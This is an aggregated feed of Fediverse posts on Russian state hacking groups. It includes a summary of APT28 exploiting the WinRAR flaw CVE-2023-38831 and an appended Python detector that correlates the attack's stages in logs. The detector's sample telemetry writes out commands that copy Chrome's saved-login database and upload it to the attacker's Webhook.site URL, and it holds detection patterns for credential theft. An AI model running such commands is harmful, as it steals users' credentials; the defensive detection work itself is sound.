#russianapt - Public Fediverse posts
Live and recent posts from across the Fediverse tagged #russianapt, aggregated by home.social.
-
🇵🇱 🇷🇺 Russian group Sandworm attacked the Polish energy sector in 2025
https://infoek.cz/ruska-skupina-sandworm-v-roce-2025-utocila-na-polskou-energetiku-2026/
#RussianAPT #Russia #APT #Poland #CyberSecurity #Tech #Sandworm #ESET
-
Russian APT Switches to New Backdoor After Malware Exposed by Researchers https://www.securityweek.com/russian-apt-switches-to-new-backdoor-after-malware-exposed-by-researchers/ #Nation-State #StarBlizzard #RussianAPT #Callisto #malware #Russia #APT
-
Russian APT Hackers Attacking Critical Infrastructure https://gbhackers.com/russian-apt-hackers-attacking-critical-infrastructure/ #CriticalInfrastructure #CVE/vulnerability #NetworkSecurity #cybersecurity #CyberAttack #RussianAPT
-
"🚨 #BreakingNews: WinRAR Vulnerability Exploited by Russian APT! 🇷🇺"
In October 2023, a cyber threat linked to a Russian nation-state actor exploited a vulnerability in WinRAR (CVE-2023-38831) for credential harvesting. The attack used a malicious archive file (IOC_09_11.rar) disguised as an IoC sharing file. Beware of phishing lures! 🎣📧
The BAT script initiated a series of PowerShell commands. Firstly, it wrote a Private RSA Key, enabling the attacker to establish a reverse shell for access to the victim's machine. Subsequently, a PowerShell script was executed to exfiltrate data, including login credentials, from Google Chrome and Microsoft Edge browsers. The stolen data was sent to a designated URL via the legitimate Webhook.site service.
This sophisticated attack was potentially associated with the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit), according to Cluster25. The attack tactics and techniques align with various stages of the MITRE ATT&CK matrix, including spearphishing attachment, malicious file execution, and data exfiltration over a web service.
Indicators of compromise (IoCs) include payload hash values (SHA256, SHA1, MD5) and the IP address (216.66.35.145) and URL (http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611) associated with the attacker's infrastructure. This incident underscores the importance of timely software patching and user awareness to prevent such cyber threats.
Source: Cluster25 Blog
Tags: #CVE202338831 #WinRAR #Phishing #CyberSecurity #APT #RussianAPT
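As an added illustration (not part of the post above or of Cluster25's report), a small Python correlator that raises an alert for a host only when two or more stages of the chain the post describes (private key dropped by script, browser credential store read, upload to Webhook.site, known infrastructure) appear in its command-line telemetry. The log format and the sample lines are constructed; the IP address and Webhook.site URL are the ones quoted in the post.

```python
import re
from collections import defaultdict

# Indicators quoted in the Cluster25 summary above.
IOC_IP = "216.66.35.145"
IOC_URL = "http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611"

# One pattern per stage of the described chain: a private key dropped by the
# script, browser credential stores read, upload to Webhook.site, known infra.
PATTERNS = {
    "private_key_written": re.compile(r"BEGIN (RSA |OPENSSH )?PRIVATE KEY"),
    "browser_creds_read": re.compile(
        r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*Login Data", re.I),
    "webhook_exfil": re.compile(r"webhook\.site/[0-9a-f-]{36}", re.I),
    "ioc_infra": re.compile(re.escape(IOC_IP) + "|" + re.escape(IOC_URL)),
}

def parse_line(line):
    """Parse the constructed log format '<ts> host=<h> proc=<p> <command>'."""
    m = re.match(r"(\S+) host=(\S+) proc=(\S+) (.*)", line)
    if not m:
        return None
    ts, host, proc, cmd = m.groups()
    return {"ts": ts, "host": host, "proc": proc, "cmd": cmd}

def correlate_hosts(lines, min_stages=2):
    """Return hosts showing at least min_stages distinct stages (one alone is weak)."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for stage, pattern in PATTERNS.items():
            if pattern.search(rec["cmd"]):
                seen[rec["host"]].add(stage)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

# Constructed sample telemetry (not real logs): ws-07 shows the full chain,
# ws-12 only a lone Webhook.site request and a harmless directory listing.
SAMPLE_LOGS = [
    r"2023-10-11T09:14:05Z host=ws-07 proc=powershell.exe Set-Content C:\Users\a\id_rsa -Value '-----BEGIN RSA PRIVATE KEY-----'",
    r"2023-10-11T09:14:09Z host=ws-07 proc=powershell.exe Copy-Item 'C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data' C:\Temp\c.db",
    r"2023-10-11T09:14:13Z host=ws-07 proc=powershell.exe Invoke-WebRequest -Uri http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611 -Method POST -InFile C:\Temp\c.db",
    r"2023-10-11T09:20:44Z host=ws-12 proc=powershell.exe Get-ChildItem C:\Users\j\AppData\Local\Microsoft\Edge\User Data\Default",
    r"2023-10-11T09:21:10Z host=ws-12 proc=powershell.exe Invoke-WebRequest -Uri https://webhook.site/8b2f0c1e-1111-4222-8333-444444444555",
]

if __name__ == "__main__":
    for host, stages in correlate_hosts(SAMPLE_LOGS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```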